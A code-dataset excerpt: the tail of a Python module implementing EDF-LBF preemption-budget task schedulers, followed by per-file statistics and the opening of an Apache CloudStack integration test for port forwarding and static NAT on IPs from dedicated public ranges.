:param taskset: type list
List of PeriodicTasks to schedule
:param topology: tuple
Tuple of networkx.Graphs that represent the communication resources and connectivity graph of the network
:return: list
Contains a tuple of (taskset, schedule, valid) where valid indicates if the schedule is valid
"""
original_taskset = taskset
taskset = self.preprocess_taskset(taskset)
self.ready_queue = PriorityQueue()
self.active_queue = []
self.curr_task = None
self.schedule = []
# First sort the taskset by activation time
hyperperiod = get_lcm_for([t.p for t in original_taskset])
self.taskset_lookup = dict([(t.name, t) for t in original_taskset])
self.instance_count = dict([(t.name, hyperperiod // t.p - 1) for t in original_taskset])
self.taskset = self.initialize_taskset(taskset)
self.taskset = list(sorted(self.taskset, key=lambda task: (task.a, task.d)))
# Let time evolve and simulate scheduling, start at first task
self.curr_time = self.taskset[0].a
while self.taskset or not self.ready_queue.empty() or self.active_queue:
# Get all released tasks into the ready queue
self.populate_ready_queue()
# Only need to worry about the active tasks (if any)
if self.ready_queue.empty() or self.active_queue and self.active_queue[0][0].k <= 0:
if self.active_queue and self.active_queue[0][0].k < 0:
import pdb
pdb.set_trace()
# If there is a current task resume it
if self.curr_task:
preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
if preempt:
next_active_task, time = self.active_queue.pop(0)
if self.curr_task != next_active_task:
self.preempt_curr_task()
if self.curr_time > next_active_task.d - next_active_task.c:
return [(taskset, None, False)]
self.schedule_until_next_event(next_active_task)
else:
if self.curr_time > self.curr_task.d - self.curr_task.c:
return [(taskset, None, False)]
self.schedule_until_next_event(self.curr_task)
# No current task, resume an active job
elif self.active_queue:
next_active_task, time = self.active_queue.pop(0)
if self.curr_time > next_active_task.d - next_active_task.c:
return [(taskset, None, False)]
self.schedule_until_next_event(next_active_task)
elif self.taskset:
self.curr_time = self.taskset[0].a
# We might need to introduce a new task into the active set
else:
p, next_ready_task = self.ready_queue.get()
if self.curr_time > next_ready_task.d - next_ready_task.c:
return [(taskset, None, False)]
preempt = True
active_tasks = [(task, entry_time) for task, entry_time in self.active_queue]
if self.curr_task is not None:
active_tasks.append((self.curr_task, self.curr_time))
active_tasks = list(sorted(active_tasks, key=lambda t: (t[0].k, t[1], t[0].name)))
# First compute the excess budget for each task
excess_budget = []
cumulative_comp_time = []
deadline_slack = []
comp_time = 0
for task, _ in active_tasks:
excess_budget.append(task.k - comp_time)
cumulative_comp_time.append(comp_time)
deadline_slack.append(task.d - self.curr_time - task.c - comp_time)
comp_time += task.c
cumulative_comp_time.append(comp_time)
# Find the earliest place in the active task queue that can tolerate full computation of new task
first_idx = len(excess_budget)
for idx in range(len(excess_budget) - 1, -1, -1):
if excess_budget[idx] < next_ready_task.c or deadline_slack[idx] - next_ready_task.c < 0:
break
else:
first_idx -= 1
# new task cannot run to completion without violating budgets
if first_idx != 0:
# Otherwise some tasks get violated, see if we can find a place to preempt new task into
earliest_idx = first_idx
for idx in range(first_idx, len(excess_budget)):
if cumulative_comp_time[idx] <= next_ready_task.k:
break
else:
earliest_idx += 1
if cumulative_comp_time[earliest_idx - 1] + active_tasks[earliest_idx - 1][0].c > next_ready_task.k:
preempt = False
# We want to insert the next_ready_task into this location to respect budgets
min_t = max(1, active_tasks[earliest_idx - 1][0].k - next_ready_task.k)
violated_idx = -1
max_t = min([task.k for task, _ in active_tasks] + deadline_slack)
for idx in range(earliest_idx - 1, -1, -1):
if excess_budget[idx] - min_t < 0 or deadline_slack[idx] - min_t < 0:
violated_idx = idx
else:
max_t = min(max_t, excess_budget[idx], deadline_slack[idx])
if violated_idx != -1:
preempt = False
if max_t - min_t < 0:
preempt = False
# If conditions satisfied preempt the task and run
if preempt:
if self.curr_task:
self.preempt_curr_task()
self.curr_task = None
self.schedule_until_next_event(next_ready_task, min_t)
if self.curr_task:
self.preempt_curr_task()
self.curr_task = None
# Otherwise run the current task or consume the active queue
else:
self.ready_queue.put((next_ready_task.d, next_ready_task))
if self.curr_task:
preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
if preempt:
self.preempt_curr_task()
next_active_task, time = self.active_queue.pop(0)
if self.curr_time > next_active_task.d - next_active_task.c:
return [(taskset, None, False)]
self.schedule_until_next_event(next_active_task)
else:
if self.curr_time > self.curr_task.d - self.curr_task.c:
return [(taskset, None, False)]
self.schedule_until_next_event(self.curr_task)
elif self.active_queue:
next_active_task, time = self.active_queue.pop(0)
if self.curr_time > next_active_task.d - next_active_task.c:
return [(taskset, None, False)]
self.schedule_until_next_event(next_active_task)
# Nothing to run, fast forward to next release
elif self.taskset:
self.curr_time = self.taskset[0].a
else:
if self.curr_task:
self.preempt_curr_task()
self.schedule_until_next_event(next_ready_task)
for _, _, t in self.schedule:
original_taskname, _ = t.name.split('|')
t.c = self.taskset_lookup[original_taskname].c
t.k = self.taskset_lookup[original_taskname].k
valid = verify_budget_schedule(original_taskset, self.schedule)
taskset = original_taskset
return [(taskset, self.schedule, valid)]
def preempt_curr_task(self):
"""
Preempts the current active task and places it in the active queue
:return: None
"""
task = self.curr_task
entry_time = self.curr_time
self.active_queue.append((task, entry_time))
self.active_queue = list(sorted(self.active_queue, key=lambda t: (t[0].k, t[1], t[0].name)))
def populate_ready_queue(self):
"""
Populates the ready queue with any tasks that are available, sorted by deadline
:return: None
"""
while self.taskset and self.taskset[0].a <= self.curr_time:
task = self.taskset.pop(0)
self.ready_queue.put((task.d, task))
def update_active_queue(self, time):
"""
Updates the preemption budget of tasks in the active queue
:param time: type int
The amount of time to reduce from preemption budgets
:return: None
"""
for task, _ in self.active_queue:
task.k -= time
def add_to_schedule(self, task, duration):
"""
Adds a task to the internal schedule and updates the preemption budgets of tasks in the active queue
:param task: type Task
The task to add to the schedule
:param duration: type int
The amount of time that the task executes for
:return: Nome
"""
super(UniResourcePreemptionBudgetScheduler, self).add_to_schedule(task, duration)
self.update_active_queue(duration)
def schedule_until_next_event(self, task, ttne=None):
"""
Schedules a task until the next point we should make a new scheduling decision
:param task: type Task
The task to add to the schedule
:param ttne: type int
A preset time-til-next-event to run the task for rather than determining from system parameters
:return: None
"""
# Time To Release of next task into ready queue
ttr = (self.taskset[0].a - self.curr_time) if self.taskset else float('inf')
# Time to consider next ready task
if not self.ready_queue.empty():
ttnr = 1
elif self.taskset:
ttnr = self.taskset[0].a - self.curr_time
else:
ttnr = float('inf')
# Time To Empty Budget in active queue
ttb = self.active_queue[0][0].k if self.active_queue and task.k > 0 else float('inf')
# Time to task completion
ttc = task.c
# Time until possible to put next ready task into active queue
ttp = float('inf')
# Schedule this task to run until the next scheduling decision
proc_time = min(ttr, ttnr, ttb, ttc, ttp)
if ttne is not None:
proc_time = ttne
self.add_to_schedule(task, proc_time)
# If the amount of time the task is run does not allow it to complete, it will be the current task at the time
# of the next scheduling decision
if proc_time < task.c:
task.c -= proc_time
self.curr_task = task
else:
original_taskname, instance = task.name.split('|')
instance = int(instance)
if instance < self.instance_count[original_taskname]:
periodic_task = self.taskset_lookup[original_taskname]
task_instance = self.create_new_task_instance(periodic_task, instance + 1)
self.taskset = list(sorted(self.taskset + [task_instance], key=lambda task: (task.a, task.d)))
self.curr_task = None
class UniResourceFixedPointPreemptionBudgetScheduler(UniResourcePreemptionBudgetScheduler):
def schedule_tasks(self, taskset, topology=None):
"""
Main scheduling function for uniprocessor EDF-LBF with fixed preemption points
:param taskset: type list
List of PeriodicTasks to schedule
:param topology: tuple
Tuple of networkx.Graphs that represent the communication resources and connectivity graph of the network
:return: list
Contains a tuple of (taskset, schedule, valid) where valid indicates if the schedule is valid
"""
original_taskset = taskset
taskset = self.preprocess_taskset(taskset)
self.ready_queue = PriorityQueue()
self.active_queue = []
self.curr_task = None
self.schedule = []
# First sort the taskset by activation time
hyperperiod = get_lcm_for([t.p for t in original_taskset])
self.taskset_lookup = dict([(t.name, t) for t in original_taskset])
self.instance_count = dict([(t.name, hyperperiod // t.p - 1) for t in original_taskset])
self.taskset = self.initialize_taskset(taskset)
self.taskset = list(sorted(self.taskset, key=lambda task: (task.a, task.d)))
# Let time evolve and simulate scheduling, start at first task
self.curr_time = self.taskset[0].a
while self.taskset or not self.ready_queue.empty() or self.active_queue:
# Get all released tasks into the ready queue
self.populate_ready_queue()
# Only need to worry about the active tasks (if any)
if self.ready_queue.empty() or self.active_queue and self.active_queue[0][0].k <= 0:
if self.active_queue and self.active_queue[0][0].k < 0:
import pdb
pdb.set_trace()
# If there is a current task resume it
if self.curr_task:
preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
if preempt:
next_active_task, time = self.active_queue.pop(0)
if self.curr_task != next_active_task:
self.preempt_curr_task()
self.schedule_until_next_event(next_active_task)
else:
self.schedule_until_next_event(self.curr_task)
# No current task, resume an active job
elif self.active_queue:
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
elif self.taskset:
self.curr_time = self.taskset[0].a
# We might need to introduce a new task into the active set
else:
p, next_ready_task = self.ready_queue.get()
if self.curr_time > next_ready_task.d - next_ready_task.c:
return [(taskset, None, False)]
preempt = True
active_tasks = [(task, entry_time) for task, entry_time in self.active_queue]
if self.curr_task is not None:
active_tasks.append((self.curr_task, self.curr_time))
active_tasks = list(sorted(active_tasks, key=lambda t: (t[0].k, t[1], t[0].name)))
# First compute the excess budget for each task
excess_budget = []
cumulative_comp_time = []
deadline_slack = []
comp_time = 0
for task, _ in active_tasks:
excess_budget.append(task.k - comp_time)
cumulative_comp_time.append(comp_time)
deadline_slack.append(task.d - self.curr_time - task.c - comp_time)
comp_time += task.c
cumulative_comp_time.append(comp_time)
# Find the earliest place in the active task queue that can tolerate full computation of new task
first_idx = len(excess_budget)
for idx in range(len(excess_budget) - 1, -1, -1):
if excess_budget[idx] < next_ready_task.c or deadline_slack[idx] - next_ready_task.c < 0:
break
else:
first_idx -= 1
# new task cannot run to completion without violating budgets
if first_idx != 0:
# Otherwise some tasks get violated, see if we can find a place to preempt new task into
earliest_idx = first_idx
for idx in range(first_idx, len(excess_budget)):
if cumulative_comp_time[idx] <= next_ready_task.k:
break
else:
earliest_idx += 1
if cumulative_comp_time[earliest_idx - 1] + active_tasks[earliest_idx - 1][0].c > next_ready_task.k:
preempt = False
# We want to insert the next_ready_task into this location to respect budgets
min_t = max(1, active_tasks[earliest_idx - 1][0].k - next_ready_task.k)
violated_idx = -1
max_t = min([task.k for task, _ in active_tasks])
for idx in range(earliest_idx - 1, -1, -1):
if excess_budget[idx] - min_t < 0 or deadline_slack[idx] - min_t < 0:
violated_idx = idx
else:
max_t = min(max_t, excess_budget[idx], deadline_slack[idx])
if violated_idx != -1:
preempt = False
if max_t - min_t < 0:
preempt = False
original_name_next_ready = next_ready_task.name.split('|')[0]
completed_comp_time = self.taskset_lookup[original_name_next_ready].c - next_ready_task.c
comp_times = [pp[0][0] - completed_comp_time - next_ready_task.a for pp in
next_ready_task.preemption_points]
comp_times = sorted(filter(lambda time: min_t <= time <= max_t, comp_times))
if not comp_times:
preempt = False
# If conditions satisfied preempt the task and run
if preempt:
if self.curr_task:
self.preempt_curr_task()
comp_time = comp_times[0]
self.schedule_until_next_event(next_ready_task, comp_time)
if self.curr_task:
self.preempt_curr_task()
self.curr_task = None
# Otherwise run the current task or consume the active queue
else:
self.ready_queue.put((next_ready_task.d, next_ready_task))
if self.curr_task:
preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
if preempt:
self.preempt_curr_task()
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
else:
self.schedule_until_next_event(self.curr_task)
elif self.active_queue:
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
# Nothing to run, fast forward to next release
elif self.taskset:
self.curr_time = self.taskset[0].a
else:
if self.curr_task:
self.preempt_curr_task()
self.schedule_until_next_event(next_ready_task)
for _, _, t in self.schedule:
original_taskname, _ = t.name.split('|')
t.c = self.taskset_lookup[original_taskname].c
t.k = self.taskset_lookup[original_taskname].k
valid = verify_budget_schedule(original_taskset, self.schedule)
taskset = original_taskset
return [(taskset, self.schedule, valid)]
def schedule_until_next_event(self, task, ttne=None):
"""
Schedules a task until the next point we should make a new scheduling decision
:param task: type Task
The task to add to the schedule
:param ttne: type int
A preset time-til-next-event to run the task for rather than determining from system parameters
:return: None
"""
# Time To Empty Budget in active queue
ttb = self.active_queue[0][0].k if self.active_queue and task.k > 0 else float('inf')
# Time to task completion
ttc = task.c
# Time to next preemption_point
original_name_next_ready = task.name.split('|')[0]
completed_comp_time = self.taskset_lookup[original_name_next_ready].c - task.c
comp_times = [pp[0][0] - completed_comp_time - task.a for pp in
task.preemption_points]
comp_times = sorted(filter(lambda time: time > 0, comp_times))
max_proc_time = ttb
if ttc <= max_proc_time:
proc_time = ttc
else:
proc_time = None
for ct in comp_times:
if max_proc_time >= ct:
proc_time = ct
else:
break
if proc_time is None:
import pdb
pdb.set_trace()
# Schedule this task to run until the next scheduling decision
if ttne is not None:
proc_time = ttne
# print("Scheduling {} for {}".format(task.name, proc_time))
self.add_to_schedule(task, proc_time)
# If the amount of time the task is run does not allow it to complete, it will be the current task at the time
# of the next scheduling decision
if proc_time < task.c:
task.c -= proc_time
self.curr_task = task
else:
original_taskname, instance = task.name.split('|')
instance = int(instance)
if instance < self.instance_count[original_taskname]:
periodic_task = self.taskset_lookup[original_taskname]
task_instance = self.create_new_task_instance(periodic_task, instance + 1)
self.taskset = list(sorted(self.taskset + [task_instance], key=lambda task: (task.a, task.d)))
self.curr_task = None
class UniResourceConsiderateFixedPointPreemptionBudgetScheduler(UniResourcePreemptionBudgetScheduler):
def schedule_tasks(self, taskset, topology=None):
"""
Main scheduling function for uniprocessor EDF-LBF with preemption points and resources
:param taskset: type list
List of PeriodicTasks to schedule
:param topology: tuple
Tuple of networkx.Graphs that represent the communication resources and connectivity graph of the network
:return: list
Contains a tuple of (taskset, schedule, valid) where valid indicates if the schedule is valid
"""
original_taskset = taskset
taskset = self.preprocess_taskset(taskset)
self.ready_queue = PriorityQueue()
self.active_queue = []
self.curr_task = None
self.schedule = []
# First sort the taskset by activation time
hyperperiod = get_lcm_for([t.p for t in original_taskset])
self.taskset_lookup = dict([(t.name, t) for t in original_taskset])
self.instance_count = dict([(t.name, hyperperiod // t.p - 1) for t in original_taskset])
self.taskset = self.initialize_taskset(taskset)
self.taskset = list(sorted(self.taskset, key=lambda task: (task.a, task.d)))
# Let time evolve and simulate scheduling, start at first task
self.curr_time = self.taskset[0].a
while self.taskset or not self.ready_queue.empty() or self.active_queue or self.curr_task:
# Get all released tasks into the ready queue
self.populate_ready_queue()
# Only need to worry about the active tasks (if any)
if self.ready_queue.empty() or self.active_queue and self.active_queue[0][0].k <= 0:
if self.active_queue and self.active_queue[0][0].k < 0:
import pdb
pdb.set_trace()
# If there is a current task resume it
if self.curr_task:
preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
if preempt:
self.preempt_curr_task()
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
else:
self.schedule_until_next_event(self.curr_task)
# No current task, resume an active job
elif self.active_queue:
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
elif self.taskset:
self.curr_time = self.taskset[0].a
# We might need to introduce a new task into the active set
else:
p, next_ready_task = self.ready_queue.get()
if self.curr_time > next_ready_task.d - next_ready_task.c:
return [(taskset, None, False)]
preempt = True
active_tasks = [(task, entry_time) for task, entry_time in self.active_queue]
if self.curr_task is not None:
active_tasks.append((self.curr_task, self.curr_time))
active_tasks = list(sorted(active_tasks, key=lambda t: (t[0].k, t[1], t[0].name)))
# First compute the excess budget for each task
excess_budget = []
cumulative_comp_time = []
deadline_slack = []
comp_time = 0
for task, _ in active_tasks:
excess_budget.append(task.k - comp_time)
cumulative_comp_time.append(comp_time)
deadline_slack.append(task.d - self.curr_time - task.c - comp_time)
comp_time += task.c
cumulative_comp_time.append(comp_time)
# Find the earliest place in the active task queue that can tolerate full computation of new task
first_idx = len(excess_budget)
for idx in range(len(excess_budget) - 1, -1, -1):
if excess_budget[idx] < next_ready_task.c or deadline_slack[idx] - next_ready_task.c < 0:
break
else:
first_idx -= 1
# new task cannot run to completion without violating budgets
if first_idx != 0:
# Otherwise some tasks get violated, see if we can find a place to preempt new task into
earliest_idx = first_idx
for idx in range(first_idx, len(excess_budget)):
if cumulative_comp_time[idx] <= next_ready_task.k:
break
else:
earliest_idx += 1
if cumulative_comp_time[earliest_idx - 1] + active_tasks[earliest_idx - 1][0].c > next_ready_task.k:
preempt = False
# We want to insert the next_ready_task into this location to respect budgets
min_t = max(1, active_tasks[earliest_idx - 1][0].k - next_ready_task.k)
violated_idx = -1
max_t = min([task.k for task, _ in active_tasks])
for idx in range(earliest_idx - 1, -1, -1):
if excess_budget[idx] - min_t < 0 or deadline_slack[idx] - min_t < 0:
violated_idx = idx
else:
max_t = min(max_t, excess_budget[idx], deadline_slack[idx])
if violated_idx != -1:
preempt = False
if max_t - min_t < 0:
preempt = False
original_name_next_ready = next_ready_task.name.split('|')[0]
completed_comp_time = self.taskset_lookup[original_name_next_ready].c - next_ready_task.c
comp_times = [pp[0][0] - completed_comp_time - next_ready_task.a for pp in
next_ready_task.preemption_points]
comp_times = sorted(filter(lambda time: min_t <= time <= max_t, comp_times))
if not comp_times:
preempt = False
else:
# Check what resources are currently locked by the active tasks
all_locked_resources = []
required_resume_resources = []
for active_task, entry_time in active_tasks:
original_name_active_task = active_task.name.split('|')[0]
completed_comp_time = self.taskset_lookup[original_name_active_task].c - active_task.c
filtered_points = filter(lambda pp: pp[0][1] - active_task.a == completed_comp_time,
active_task.preemption_points)
current_preemption_point = list(filtered_points)[0]
all_locked_resources += current_preemption_point[1]
resuming_points = [pp for pp in active_task.preemption_points
if pp[0][0] - active_task.a >= completed_comp_time]
required_resume_resources += [r for pp in resuming_points for r in pp[2]]
# Check if next_ready_task has the resources it needs and leaves resources unlocked for
# resuming tasks
next_ready_task_pp = list(filter(lambda pp: pp[0][1] - next_ready_task.a == comp_times[0],
next_ready_task.preemption_points))[0]
next_ready_locked_resources = next_ready_task_pp[1]
next_ready_required_resources = next_ready_task_pp[2]
if set(next_ready_required_resources) & set(all_locked_resources) or \
set(next_ready_locked_resources) & set(required_resume_resources):
preempt = False
# If conditions satisfied preempt the task and run
if preempt:
if self.curr_task:
self.preempt_curr_task()
comp_time = comp_times[0]
self.schedule_until_next_event(next_ready_task, comp_time)
if self.curr_task:
self.preempt_curr_task()
self.curr_task = None
# Otherwise run the current task or consume the active queue
else:
self.ready_queue.put((next_ready_task.d, next_ready_task))
if self.curr_task:
preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
if preempt:
self.preempt_curr_task()
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
else:
self.schedule_until_next_event(self.curr_task)
elif self.active_queue:
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
# Nothing to run, fast forward to next release
elif self.taskset:
self.curr_time = self.taskset[0].a
else:
# Check what resources are currently locked by the active tasks
all_locked_resources = []
for active_task, entry_time in active_tasks:
original_name_active_task = active_task.name.split('|')[0]
completed_comp_time = self.taskset_lookup[original_name_active_task].c - active_task.c
current_preemption_point = list(
filter(lambda pp: pp[0][1] - active_task.a == completed_comp_time,
active_task.preemption_points))[0]
all_locked_resources += current_preemption_point[1]
# Check if next_ready_task has the resources it needs and leaves resources unlocked for resuming
# tasks
next_ready_task_pp = next_ready_task.preemption_points[-1]
next_ready_required_resources = next_ready_task_pp[2]
if set(next_ready_required_resources) & set(all_locked_resources):
preempt = False
if preempt:
if self.curr_task:
self.preempt_curr_task()
self.schedule_until_next_event(next_ready_task)
# Otherwise run the current task or consume the active queue
else:
self.ready_queue.put((next_ready_task.d, next_ready_task))
if self.curr_task:
preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
if preempt:
self.preempt_curr_task()
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
else:
self.schedule_until_next_event(self.curr_task)
elif self.active_queue:
next_active_task, time = self.active_queue.pop(0)
self.schedule_until_next_event(next_active_task)
# Nothing to run, fast forward to next release
elif self.taskset:
self.curr_time = self.taskset[0].a
for _, _, t in self.schedule:
original_taskname, _ = t.name.split('|')
t.c = self.taskset_lookup[original_taskname].c
t.k = self.taskset_lookup[original_taskname].k
valid = verify_budget_schedule(original_taskset, self.schedule)
taskset = original_taskset
return [(taskset, self.schedule, valid)]
def schedule_until_next_event(self, task, ttne=None):
"""
Schedules a task until the next point we should make a new scheduling decision
:param task: type Task
The task to add to the schedule
:param ttne: type int
A preset time-til-next-event to run the task for rather than determining from system parameters
:return: None
"""
# Time to consider next ready task / release of next task into ready queue
if not self.ready_queue.empty():
ttnr = 1
elif self.taskset:
ttnr = self.taskset[0].a - self.curr_time
else:
ttnr = float('inf')
# Time To Empty Budget in active queue
ttb = self.active_queue[0][0].k if self.active_queue and task.k > 0 else float('inf')
# Time to next preemption_point
original_name_next_ready = task.name.split('|')[0]
completed_comp_time = self.taskset_lookup[original_name_next_ready].c - task.c
comp_times = [pp[0][1] - completed_comp_time - task.a for pp in
task.preemption_points]
comp_times = sorted(filter(lambda time: time > 0, comp_times))
max_proc_time = ttb
proc_time = 0
for ct in comp_times:
if max_proc_time >= ct:
proc_time += ct
if ttnr <= self.curr_time + ct:
break
else:
break
if proc_time is None or proc_time > max_proc_time:
import pdb
pdb.set_trace()
# Schedule this task to run until the next scheduling decision
if ttne is not None:
proc_time = ttne
self.add_to_schedule(task, proc_time)
# If the amount of time the task is run does not allow it to complete, it will be the current task at the time
# of the next scheduling decision
if proc_time < task.c:
task.c -= proc_time
self.curr_task = task
else:
original_taskname, instance = task.name.split('|')
instance = int(instance)
if instance < self.instance_count[original_taskname]:
periodic_task = self.taskset_lookup[original_taskname]
task_instance = self.create_new_task_instance(periodic_task, instance + 1)
self.taskset = list(sorted(self.taskset + [task_instance], key=lambda task: (task.a, task.d)))
self.curr_task = None
| 48.385482
| 120
| 0.550285
| 4,600
| 38,660
| 4.40087
| 0.053478
| 0.034776
| 0.048903
| 0.032602
| 0.918247
| 0.912567
| 0.906639
| 0.894833
| 0.892907
| 0.888461
| 0
| 0.008679
| 0.380083
| 38,660
| 798
| 121
| 48.446115
| 0.836018
| 0.171133
| 0
| 0.893458
| 0
| 0
| 0.001051
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018692
| false
| 0
| 0.016822
| 0
| 0.063551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91db55f6a6e21f30d05f690510442f2248488a06
| 54,805
|
py
|
Python
|
test/integration/component/test_multiple_public_interfaces.py
|
lujiefsi/cloudstack
|
74a7cbf753537928265c1f36afe086d69ad44e90
|
[
"Apache-2.0"
] | 1
|
2020-06-17T08:53:55.000Z
|
2020-06-17T08:53:55.000Z
|
test/integration/component/test_multiple_public_interfaces.py
|
lujiefsi/cloudstack
|
74a7cbf753537928265c1f36afe086d69ad44e90
|
[
"Apache-2.0"
] | 4
|
2021-09-11T01:43:33.000Z
|
2022-03-10T22:44:41.000Z
|
test/integration/component/test_multiple_public_interfaces.py
|
lujiefsi/cloudstack
|
74a7cbf753537928265c1f36afe086d69ad44e90
|
[
"Apache-2.0"
] | 1
|
2017-04-03T18:22:22.000Z
|
2017-04-03T18:22:22.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" BVT tests for network services on public IP's from different public IP
range than that of associated source NAT IP of the network. Each IP associated
with network from a different public IP range results in a new public
interface on VR (eth3, eth4 etc) and iptable
"""
# Import Local Modules
from marvin.codes import (FAILED)
from marvin.cloudstackTestCase import cloudstackTestCase
from marvin.cloudstackException import CloudstackAPIException
from marvin.cloudstackAPI import rebootRouter
from marvin.sshClient import SshClient
from marvin.lib.utils import cleanup_resources, get_process_status
from marvin.lib.base import (Account,
VirtualMachine,
ServiceOffering,
NATRule,
PublicIPAddress,
StaticNATRule,
FireWallRule,
Network,
NetworkOffering,
LoadBalancerRule,
PublicIpRange,
Router,
VpcOffering,
VPC,
NetworkACLList,
NetworkACL)
from marvin.lib.common import (get_domain,
get_zone,
get_template,
list_hosts,
list_routers)
from nose.plugins.attrib import attr
from ddt import ddt, data
# Import System modules
import socket
import time
import logging
_multiprocess_shared_ = True
logger = logging.getLogger('TestNetworkOps')
stream_handler = logging.StreamHandler()
logger.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
class TestPortForwarding(cloudstackTestCase):
@classmethod
def setUpClass(cls):
testClient = super(TestPortForwarding, cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
cls.hypervisor = testClient.getHypervisorInfo()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["zoneid"] = cls.zone.id
template = get_template(
cls.apiclient,
cls.zone.id,
cls.services["ostype"]
)
if template == FAILED:
assert False, "get_template() failed to return template with description %s" % cls.services[
"ostype"]
# Create an account, network, VM and IP addresses
cls.account = Account.create(
cls.apiclient,
cls.services["account"],
admin=True,
domainid=cls.domain.id
)
cls.services["publiciprange"]["zoneid"] = cls.zone.id
cls.service_offering = ServiceOffering.create(
cls.apiclient,
cls.services["service_offerings"]["tiny"]
)
cls.virtual_machine = VirtualMachine.create(
cls.apiclient,
cls.services["virtual_machine"],
templateid=template.id,
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
cls._cleanup = [
cls.virtual_machine,
cls.account,
cls.service_offering
]
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
cls.apiclient = super(
TestPortForwarding,
cls).getClsTestClient().getApiClient()
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
def tearDown(self):
cleanup_resources(self.apiclient, self.cleanup)
return
@attr(tags=["advanced", "smoke"], required_hardware="true")
def test_port_forwarding_on_ip_from_non_src_nat_ip_range(self):
"""Test for port forwarding on a IP which is in pubic IP range different
from public IP range that has source NAT IP associated with network
"""
# Validate the following:
# 1. Create a new public IP range and dedicate to a account
# 2. Acquire a IP from new public range
# 3. create a port forwarding on acquired IP from new range
# 4. Create a firewall rule to open up the port
# 5. Test SSH works to the VM
self.public_ip_range = PublicIpRange.create(
self.apiclient,
self.services["publiciprange"]
)
logger.debug("Dedicating Public IP range to the account");
dedicate_public_ip_range_response = PublicIpRange.dedicate(
self.apiclient,
self.public_ip_range.vlan.id,
account=self.account.name,
domainid=self.account.domainid
)
ip_address = PublicIPAddress.create(
self.apiclient,
self.account.name,
self.zone.id,
self.account.domainid,
self.services["virtual_machine"]
)
self.cleanup.append(ip_address)
self.cleanup.append(self.public_ip_range)
# Check if VM is in Running state before creating NAT and firewall rules
vm_response = VirtualMachine.list(
self.apiclient,
id=self.virtual_machine.id
)
self.assertEqual(
isinstance(vm_response, list),
True,
"Check list VM returns a valid list"
)
self.assertNotEqual(
len(vm_response),
0,
"Check Port Forwarding Rule is created"
)
self.assertEqual(
vm_response[0].state,
'Running',
"VM state should be Running before creating a NAT rule."
)
# Open up firewall port for SSH
FireWallRule.create(
self.apiclient,
ipaddressid=ip_address.ipaddress.id,
protocol=self.services["natrule"]["protocol"],
cidrlist=['0.0.0.0/0'],
startport=self.services["natrule"]["publicport"],
endport=self.services["natrule"]["publicport"]
)
# Create PF rule
nat_rule = NATRule.create(
self.apiclient,
self.virtual_machine,
self.services["natrule"],
ip_address.ipaddress.id
)
try:
logger.debug("SSHing into VM with IP address %s with NAT IP %s" %
(
self.virtual_machine.ipaddress,
ip_address.ipaddress.ipaddress
))
self.virtual_machine.get_ssh_client(ip_address.ipaddress.ipaddress)
except Exception as e:
self.fail(
"SSH Access failed for %s: %s" %
(self.virtual_machine.ipaddress, e)
)
nat_rule.delete(self.apiclient)
class TestStaticNat(cloudstackTestCase):
@classmethod
def setUpClass(cls):
testClient = super(TestStaticNat, cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
cls.hypervisor = testClient.getHypervisorInfo()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["zoneid"] = cls.zone.id
template = get_template(
cls.apiclient,
cls.zone.id,
cls.services["ostype"]
)
if template == FAILED:
assert False, "get_template() failed to return template with description %s" % cls.services[
"ostype"]
# Create an account, network, VM and IP addresses
cls.account = Account.create(
cls.apiclient,
cls.services["account"],
admin=True,
domainid=cls.domain.id
)
cls.services["publiciprange"]["zoneid"] = cls.zone.id
cls.service_offering = ServiceOffering.create(
cls.apiclient,
cls.services["service_offerings"]["tiny"]
)
